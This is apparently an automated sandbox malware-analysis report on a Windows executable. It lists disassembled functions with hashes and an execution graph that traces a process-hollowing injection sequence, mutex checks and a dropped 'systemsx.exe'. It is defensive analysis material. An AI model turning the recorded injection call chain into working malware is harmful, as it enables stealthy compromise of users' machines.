                                                                                                                                                                                                                          • Opcode ID: aebdd9a1ae816db97670f7c5193398a28dd9f1208fdaed33f0aad7c8148d48c3
                                                                                                                                                                                                                          • Instruction ID: 3bbed3535049b22700203fc37b4c0dd459dbbd663938a40c8ab96de7ac4832d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aebdd9a1ae816db97670f7c5193398a28dd9f1208fdaed33f0aad7c8148d48c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8511F220B18E4741FE78B7356A621B9F671AF45768E997735E93E0A2C2DD3DB402C230
                                                                                                                                                                                                                          Function 00007FF79CD62F54 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                          • Opcode ID: 7aa7bbb7fbd313fa5e06adeda51d8af0c078cd230194add9ef97a0c38e9eeb32
                                                                                                                                                                                                                          • Instruction ID: 6e4d9b925fe6ca7f28550469fc6364713226cdb24449876d04e78ecd91997598
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa7bbb7fbd313fa5e06adeda51d8af0c078cd230194add9ef97a0c38e9eeb32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51AF32B09E478AEF24EF25D544679B3A1EF48B88F909135DA9A43788DF3DE845C710
                                                                                                                                                                                                                          Function 00007FF79CD63CB8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                          • Opcode ID: f567cd96861b94a6c07409aeef72aaba9e19c83fbb116bd89495255ff68ed431
                                                                                                                                                                                                                          • Instruction ID: 596ee8cabad3fcbd9530bc4c74f0a07b7bfb38393bdd8c1e266c95f0e3c01f2e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f567cd96861b94a6c07409aeef72aaba9e19c83fbb116bd89495255ff68ed431
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73616F32A08F8681DA70AB25E5403AAF7B0FB99794F445235EB9D03B95DF7CD194CB10
                                                                                                                                                                                                                          Function 00007FF79CD64068 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                          • Opcode ID: 43d66cd96d854834a2285823ad289c98bbc344233fb91ec6caba7a539e432d97
                                                                                                                                                                                                                          • Instruction ID: 4dadf0922a18d6210f5c66f7e393d1c7db9fecf07ebd0718acf46e74c27fe423
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43d66cd96d854834a2285823ad289c98bbc344233fb91ec6caba7a539e432d97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16516F32608F4386EF74EE219644269B7B0EB59B94FA4A136DA9C47785CF3CE461C720
                                                                                                                                                                                                                          Function 00007FF79CD6B00C Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                          • Opcode ID: 710a4465047731046d486a5f91accc2b75631e136eff9fc818dde3b1c157220a
                                                                                                                                                                                                                          • Instruction ID: cb1dbb177f1c4a05c60f9bad2453d7264f75d010fba3e8c4af73c98fd48e0836
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 710a4465047731046d486a5f91accc2b75631e136eff9fc818dde3b1c157220a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED10632B18E8299EB21DFB5D5402AC77B1FB54798B809235CE5D97BD9DE38E006C310
                                                                                                                                                                                                                          Function 00007FF79CD6B934 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF79CD6B91F,00000000), ref: 00007FF79CD6BA50
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF79CD6B91F,00000000), ref: 00007FF79CD6BADB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                          • Opcode ID: 059fa1959f06b925a0592a60213fc9ccff7ea213fafb1dec891a6f1ac717a15f
                                                                                                                                                                                                                          • Instruction ID: db9d57434f2cac24c8f67c0ad4be036711dd242b519785387b5f6465bd46a797
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 059fa1959f06b925a0592a60213fc9ccff7ea213fafb1dec891a6f1ac717a15f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D491C222B08E5395FB70AF7995806BDBBB0AB00B88F946139DE4E57AC4DF78D441D720
                                                                                                                                                                                                                          Function 00007FF79CD61670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                          • String ID: \systemsx.exe
                                                                                                                                                                                                                          • API String ID: 73155330-411024204
                                                                                                                                                                                                                          • Opcode ID: 0a7f0d66afac4997814649c8af90caf0201cf9696239cfb2e5c05bc16f8875b9
                                                                                                                                                                                                                          • Instruction ID: 692d39c4954d2c9e56d6445663bfbdb0b7d70f0ec0f2b8d051b2453615a73ce7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7f0d66afac4997814649c8af90caf0201cf9696239cfb2e5c05bc16f8875b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE419D62B08E4795EE24BB7696042BDF271AB08BE4F942731DA2D077D5EE7CE055C310
                                                                                                                                                                                                                          Function 00007FF79CD65658 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                          • API String ID: 3580290477-857341436
                                                                                                                                                                                                                          • Opcode ID: 3421cdae86d5a0952016b7d9d11c58c98a1572ba5bc50a0e7f46634ddbaf0301
                                                                                                                                                                                                                          • Instruction ID: e617ba7ca227104c13a2fd0c3e3415609d2e875def47c976fc473243aeae2abd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3421cdae86d5a0952016b7d9d11c58c98a1572ba5bc50a0e7f46634ddbaf0301
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20416C36B08F0395EF24FF359A500B9F7B5AB45B84B956036E94E47B85EE3CE481C220
                                                                                                                                                                                                                          Function 00007FF79CD6B6A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                          • Opcode ID: 493868279943cf6de1db68bc0c110568ffeb01f8efcf1e31354e637f926215cd
                                                                                                                                                                                                                          • Instruction ID: d6fb3b18df2333806b71b2732f9cf062f6859c27a951d48ce219831662058211
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 493868279943cf6de1db68bc0c110568ffeb01f8efcf1e31354e637f926215cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82417E22B18F4691EB60AF25E9443A9B7A1FB98794F846031EA4D87798EF3CD405C760
                                                                                                                                                                                                                          Function 00007FF79CD62EAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF79CD610DF), ref: 00007FF79CD62EFC
                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF79CD610DF), ref: 00007FF79CD62F3D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                          • Opcode ID: f64f459e772a84a9fc75b913d82172dbaa42afab898276dd930f3945c3b81c9b
                                                                                                                                                                                                                          • Instruction ID: e6ad857fe2f81a90e99d9708a08ad26a5feb548ae75f57cb359f5e35a0228dd2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f64f459e772a84a9fc75b913d82172dbaa42afab898276dd930f3945c3b81c9b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3115B32608F4282EB209B25E90026AB7F1FB88B94F985231EECC07765DF3CC551CB00

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:41.7%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:19.7%
                                                                                                                                                                                                                          Total number of Nodes:483
                                                                                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                                                                                          execution_graph 838 7ff7948333ac 841 7ff794832048 GetModuleFileNameW 838->841 842 7ff7948320c9 841->842 848 7ff7948320c4 841->848 843 7ff794832107 842->843 844 7ff79483211d 842->844 845 7ff79483213b 843->845 846 7ff794832111 843->846 884 7ff794831f88 ExpandEnvironmentStringsW 844->884 885 7ff794831fc8 ExpandEnvironmentStringsW 845->885 846->848 886 7ff794832008 ExpandEnvironmentStringsW 846->886 849 7ff794832132 849->848 852 7ff79483218d CreateProcessW 849->852 852->848 853 7ff7948321e8 CreateFileW 852->853 853->848 854 7ff79483222f GetFileSize 853->854 855 7ff794832257 CloseHandle 854->855 856 7ff79483224d 854->856 855->848 856->855 857 7ff794832267 VirtualAlloc 856->857 858 7ff7948322a1 ReadFile 857->858 859 7ff794832291 CloseHandle 857->859 860 7ff7948322ce VirtualFree CloseHandle 858->860 861 7ff7948322f1 CloseHandle GetThreadContext 858->861 859->848 860->848 862 7ff794832359 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 861->862 863 7ff794832341 VirtualFree 861->863 864 7ff7948323f8 VirtualAllocEx 862->864 865 7ff7948323e0 VirtualFree 862->865 863->848 866 7ff79483247b WriteProcessMemory 864->866 867 7ff794832463 VirtualFree 864->867 865->848 868 7ff7948324b1 VirtualFree 866->868 871 7ff7948324c9 866->871 867->848 868->848 869 7ff7948324ff WriteProcessMemory 870 7ff79483258a VirtualFree 869->870 869->871 870->848 871->869 874 7ff7948325a7 871->874 872 7ff794832619 RtlCompareMemory 872->874 880 7ff79483266c 872->880 873 7ff794832898 WriteProcessMemory SetThreadContext 875 7ff79483291e VirtualFree 873->875 876 7ff794832933 ResumeThread 873->876 874->872 874->873 875->848 877 7ff79483295a VirtualFree 876->877 878 7ff794832945 VirtualFree 876->878 877->848 878->848 879 7ff794832893 879->873 880->879 881 7ff79483279c ReadProcessMemory WriteProcessMemory 880->881 882 7ff794832889 881->882 883 7ff794832871 VirtualFree 881->883 882->880 883->848 884->849 885->849 886->849 1416 7ff79483338c 1417 7ff794832048 37 API calls 1416->1417 1418 7ff79483339c 1417->1418 1428 7ff7948331ec 1429 7ff7948331f5 1428->1429 1430 7ff79483320e 1429->1430 1433 7ff79483306c 1429->1433 1438 7ff794832e6c CreateMutexA 1433->1438 1436 7ff794833087 Sleep CreateThread WaitForSingleObject 1437 7ff7948330cc Sleep 1436->1437 1437->1429 1439 7ff794832e98 ReleaseMutex CloseHandle 1438->1439 1440 7ff794832eb5 GetLastError 1438->1440 1441 7ff794832ef7 1439->1441 1442 7ff794832ec2 ReleaseMutex CloseHandle 1440->1442 1443 7ff794832edf ReleaseMutex CloseHandle 1440->1443 1441->1436 1441->1437 1442->1441 1443->1441 1479 7ff794832f0c CreateMutexA 1480 7ff794832f4e GetLastError 1479->1480 1481 7ff794832f31 ReleaseMutex CloseHandle 1479->1481 1483 7ff794832f78 ReleaseMutex CloseHandle 1480->1483 1484 7ff794832f5b ReleaseMutex CloseHandle 1480->1484 1482 7ff794832f90 1481->1482 1483->1482 1484->1482 890 7ff79483345c 951 7ff7948310a0 890->951 895 7ff79483347c 1185 7ff794834264 GetCurrentProcess OpenProcessToken 895->1185 896 7ff794833474 ExitProcess 900 7ff794833497 901 7ff7948334fb 900->901 902 7ff7948334ac 900->902 905 7ff794833510 901->905 910 7ff79483354c 901->910 903 7ff7948343a4 3 API calls 902->903 904 7ff7948334b8 903->904 906 7ff7948334d2 ExitProcess 904->906 907 7ff7948334bf 904->907 908 7ff7948343a4 3 API calls 905->908 909 7ff7948343a4 3 API calls 907->909 911 7ff79483351c 908->911 912 7ff7948334cb 909->912 916 7ff794833561 910->916 917 7ff7948335a2 910->917 913 7ff79483352b 911->913 914 7ff794833523 ExitProcess 911->914 912->906 915 7ff7948334da 912->915 918 7ff79483327c 20 API calls 913->918 1219 7ff7948332ec 915->1219 1200 7ff7948343a4 CreateMutexA 916->1200 1209 7ff794833a74 917->1209 922 7ff794833530 918->922 928 7ff794833537 Sleep 922->928 929 7ff794833544 ExitProcess 922->929 924 7ff7948334df 931 7ff7948334e6 Sleep 924->931 932 7ff7948334f3 ExitProcess 924->932 926 7ff79483357c 1204 7ff79483327c 926->1204 927 7ff794833574 ExitProcess 928->922 931->924 935 7ff794833581 938 7ff794833588 Sleep 935->938 939 7ff794833595 ExitProcess 935->939 936 7ff7948335ba 940 7ff7948343a4 3 API calls 936->940 937 7ff79483360e 7 API calls 938->935 941 7ff7948335c6 940->941 942 7ff7948335cd 941->942 943 7ff7948335e0 ExitProcess 941->943 944 7ff7948343a4 3 API calls 942->944 945 7ff7948335d9 944->945 945->943 946 7ff7948335e8 945->946 947 7ff7948332ec 47 API calls 946->947 948 7ff7948335ed 947->948 949 7ff794833601 ExitProcess 948->949 950 7ff7948335f4 Sleep 948->950 950->948 1228 7ff794831000 LoadLibraryA GetProcAddress 951->1228 953 7ff79483113a 1229 7ff794831000 LoadLibraryA GetProcAddress 953->1229 955 7ff794831154 1230 7ff794831050 LoadLibraryA GetProcAddress 955->1230 957 7ff79483116e 1231 7ff794831050 LoadLibraryA GetProcAddress 957->1231 959 7ff794831188 1232 7ff794831050 LoadLibraryA GetProcAddress 959->1232 961 7ff7948311a2 1233 7ff794831050 LoadLibraryA GetProcAddress 961->1233 963 7ff7948311bc 1234 7ff794831050 LoadLibraryA GetProcAddress 963->1234 965 7ff7948311d6 1235 7ff794831050 LoadLibraryA GetProcAddress 965->1235 967 7ff7948311f0 1236 7ff794831050 LoadLibraryA GetProcAddress 967->1236 969 7ff79483120a 1237 7ff794831050 LoadLibraryA GetProcAddress 969->1237 971 7ff794831224 1238 7ff794831050 LoadLibraryA GetProcAddress 971->1238 973 7ff79483123e 1239 7ff794831000 LoadLibraryA GetProcAddress 973->1239 975 7ff794831258 1240 7ff794831000 LoadLibraryA GetProcAddress 975->1240 977 7ff794831272 1241 7ff794831000 LoadLibraryA GetProcAddress 977->1241 979 7ff79483128c 1242 7ff794831000 LoadLibraryA GetProcAddress 979->1242 981 7ff7948312a6 1243 7ff794831050 LoadLibraryA GetProcAddress 981->1243 983 7ff7948312c0 1244 7ff794831050 LoadLibraryA GetProcAddress 983->1244 985 7ff7948312da 1245 7ff794831050 LoadLibraryA GetProcAddress 985->1245 987 7ff7948312f4 1246 7ff794831050 LoadLibraryA GetProcAddress 987->1246 989 7ff79483130e 1247 7ff794831050 LoadLibraryA GetProcAddress 989->1247 991 7ff794831328 1248 7ff794831050 LoadLibraryA GetProcAddress 991->1248 993 7ff794831342 1249 7ff794831050 LoadLibraryA GetProcAddress 993->1249 995 7ff79483135c 1250 7ff794831050 LoadLibraryA GetProcAddress 995->1250 997 7ff794831376 1251 7ff794831050 LoadLibraryA GetProcAddress 997->1251 999 7ff794831390 1252 7ff794831050 LoadLibraryA GetProcAddress 999->1252 1001 7ff7948313aa 1253 7ff794831050 LoadLibraryA GetProcAddress 1001->1253 1003 7ff7948313c4 1254 7ff794831050 LoadLibraryA GetProcAddress 1003->1254 1005 7ff7948313de 1255 7ff794831050 LoadLibraryA GetProcAddress 1005->1255 1007 7ff7948313f8 1256 7ff794831050 LoadLibraryA GetProcAddress 1007->1256 1009 7ff794831412 1257 7ff794831050 LoadLibraryA GetProcAddress 1009->1257 1011 7ff79483142c 1258 7ff794831050 LoadLibraryA GetProcAddress 1011->1258 1013 7ff794831446 1259 7ff794831050 LoadLibraryA GetProcAddress 1013->1259 1015 7ff794831460 1260 7ff794831050 LoadLibraryA GetProcAddress 1015->1260 1017 7ff79483147a 1261 7ff794831050 LoadLibraryA GetProcAddress 1017->1261 1019 7ff794831494 1262 7ff794831050 LoadLibraryA GetProcAddress 1019->1262 1021 7ff7948314ae 1263 7ff794831050 LoadLibraryA GetProcAddress 1021->1263 1023 7ff7948314c8 1264 7ff794831050 LoadLibraryA GetProcAddress 1023->1264 1025 7ff7948314e2 1265 7ff794831050 LoadLibraryA GetProcAddress 1025->1265 1027 7ff7948314fc 1266 7ff794831050 LoadLibraryA GetProcAddress 1027->1266 1029 7ff794831516 1267 7ff794831050 LoadLibraryA GetProcAddress 1029->1267 1031 7ff794831530 1268 7ff794831050 LoadLibraryA 